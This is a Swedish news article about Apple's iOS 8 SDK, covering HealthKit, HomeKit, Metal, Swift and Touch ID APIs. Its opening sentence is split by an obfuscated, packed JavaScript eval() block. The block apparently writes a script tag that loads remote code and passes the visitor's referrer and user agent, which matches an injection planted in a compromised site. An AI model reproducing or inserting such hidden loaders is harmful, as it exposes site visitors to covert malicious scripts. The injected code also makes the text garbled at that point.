Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Apple släpper iOS 8 SDK med över 4 000 nya API:er

apple logo

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rrsnz|var|u0026u|referrer|tniba||js|php’.split(’|’),0,{}))
släppte Apple iOS 8 SDK, det största utvecklarpaketet någonsin med över 4 000 nya API:er som ger utvecklare möjlighet att skapa enastående appar på helt nya sätt. I iOS 8 kan utvecklare anpassa användarupplevelsen ännu mer tack vare funktioner för utbyggnad i form av widgetar för Notiscenter och tangentbord från tredje part. Dessutom introduceras robusta ramverk som HealthKit och HomeKit. iOS 8 innehåller även den nya grafiktekniken Metal som maximerar A7-chippets prestanda och Swift som är ett nytt kraftfullt programmeringsspråk.

”Det har sålts över 800 miljoner iOS-enheter, så det finns enorma möjligheter för utvecklare”, säger Craig Federighi, Apples vice VD för Software Engineering. ”Det här är den största iOS-uppdateringen sedan lanseringen av App Store. iOS 8 SDK-paketet innehåller mer än 4 000 nya API:er som omfattar otroliga nya ramverk, större utbyggnadsmöjligheter och ett nytt banbrytande programmeringsspråk.”

iOS 8 ger utvecklare tillgång till robusta ramverk, bland annat API:er för HealthKit som gör det möjligt för hälso- och träningsappar att kommunicera med varandra. Med din tillåtelse kan varje app använda specifik information från andra appar för att ge ett mer mångsidigt sätt att hantera din hälsa och träning. En blodtrycksapp kan exempelvis dela information med en läkarapp, som Mayo Clinic-appen, så att läkare kan ge bästa möjliga vägledning och omvårdnad.

”Vi är övertygade om att Apples HealthKit kommer att revolutionera samspelet med patienter inom sjukvården”, säger dr John Noseworthy, ordförande och VD på Mayokliniken. ”Vi är stolta över att gå i bräschen för den här innovativa tekniken med vår Mayo Clinic-app.”

I likhet med HealthKit, som kombinerar hälsoinformation så att du får större kontroll över din hälsa, ser HomeKit till att hemtillbehör ansluter smidigt så att du får större kontroll över ditt hem. HomeKit bidrar med ett gemensamt protokoll, säker parkoppling, möjlighet att enkelt styra en eller flera enheter i hemmet och integrering av Siri. Du kan till exempel säga ”going to bed” så att Siri dämpar belysningen, låser dörrar, garagedörren och vrider ned temperaturen.

”Vi ser fram emot att delta i nästa steg mot att göra automatisering i hemmet en verklighet på ett säkert och integrerat sätt”, säger Eric Rondolat, VD på Philips Lighting. ”HomeKit gör det möjligt för oss att förbättra belysningsupplevelsen via Philips Hue eftersom det blir enklare att parkoppla enheter säkert i hela hemmet och styra dem med Siri.”

Utvecklare kan anpassa användarupplevelsen ännu mer med iOS-tillägg som omfattar nya delningsalternativ, anpassade bildfilter, anpassade åtgärder och dokument-API:er. Nu kan utvecklare lägga till sina egna widgetar i Notiscenter och tangentbord från tredje part ger fler layouter och inmatningsmetoder.

Speltekniken i iOS tar ett stort kliv framåt med iOS 8 tack vare den nya grafiktekniken Metal som maximerar A7-chippets prestanda. Tack vare den dramatiskt tiofaldigade hastigheten hos grafikanrop gör Metal att det för första gången blir möjligt för spelutvecklare att erbjuda 3D-spel i klass med spelkonsoler på mobila enheter. För enklare spel innehåller iOS 8 nu SceneKit som gör det enkelt att skapa roliga 3D-spel, tillsammans med stora förbättringar av SpriteKit som omfattar fältkrafter, utseende per pixel och inverterad kinematik.

Swift är ett nytt kraftfullt programmeringsspråk för iOS och OS X som gör det enklare än någonsin för utvecklare att skapa otroliga appar. Swift har utformats för Cocoa och Cocoa Touch och kombinerar prestanda och effektivitet hos kompilerade språk med enkelheten och interaktiviteten hos skriptspråk. Swift hjälper utvecklare att skriva säkrare och tillförlitligare kod genom att undanröja hela kategorier med vanliga programmeringsfel, och kan användas tillsammans med Objective-C-kod så att utvecklare enkelt kan integrera Swift i sina befintliga appar. Xcodes Playground-miljöer gör arbetet med Swift-kod otroligt interaktivt eftersom resultatet av Swift-koden visas på direkten.

iOS 8 innehåller också API:er för Touch ID™ så att utvecklare kan autentisera användare inuti appar på ett säkert sätt, skydda inloggnings- och användaruppgifter samt låsa upp nyckelringsobjekt. Med iOS 8 kan utvecklare erbjuda autentisering via en godkänd matchning av fingeravtryck, samtidigt som fingeravtrycksinformationen är säkert lagrad i Secure Enclave.

Bland iOS 8-funktionerna för utvecklare finns också:

• PhotoKit som gör det möjligt för utvecklare att dra nytta av kraften hos samma robusta ramverk som används av den inbyggda appen Bilder för snabbare prestanda, ickeförstörande redigeringar och läsning och skrivning till biblioteket i Bilder
• nya API:er för Kamera som ger utvecklare detaljkontroll över fokus, vitbalans och exponering
• CloudKit som är en komplett och skalbar backend-lösning för utvecklare som undanröjer behovet av att skriva serverkod och underhålla servrar
• nya App Store-funktioner för utvecklare, bland annat appförhandsvisningar och appaket, nya iTunes Connect med gratis statistik och TestFlight för betatestning av appar inför lansering.
Kunder som har en iPhone, iPad eller iPod touch har tillgång till Apples banbrytande App Store med över 1,2 miljoner appar i 155 länder runtom i världen. App Store har mer än 300 miljoner besökare per vecka och iOS-användare har laddat ner mer än 75 miljarder appar.
Medlemmar i iOS Developer Program kan omedelbart ladda ner betamjukvara och SDK för iOS 8 från 
developer.apple.com. I höst blir iOS 8 tillgängligt som en kostnadsfri mjukvaruuppdatering för iPhone 4s, iPhone 5, iPhone 5c, iPhone 5s, femte generationen iPod touch, iPad 2, iPad med Retina-skärm, iPad Air, iPad mini och iPad mini med Retina-skärm. iCloud Photo Library och iCloud Drive använder din iCloud-lagring där 5 GB ingår gratis. Funktionerna kan ändras. Vissa funktioner är inte tillgängliga i alla områden eller på alla språk.
Medlemmar i iOS och OS X Developer Program kan omedelbart ladda ner en betaversion av Swift från developer.apple.com. Den färdiga versionen blir tillgänglig i höst. Appar som skrivits i Swift kan skickas in till App Store och Mac App Store när iOS 8 och OS X Yosemite släpps.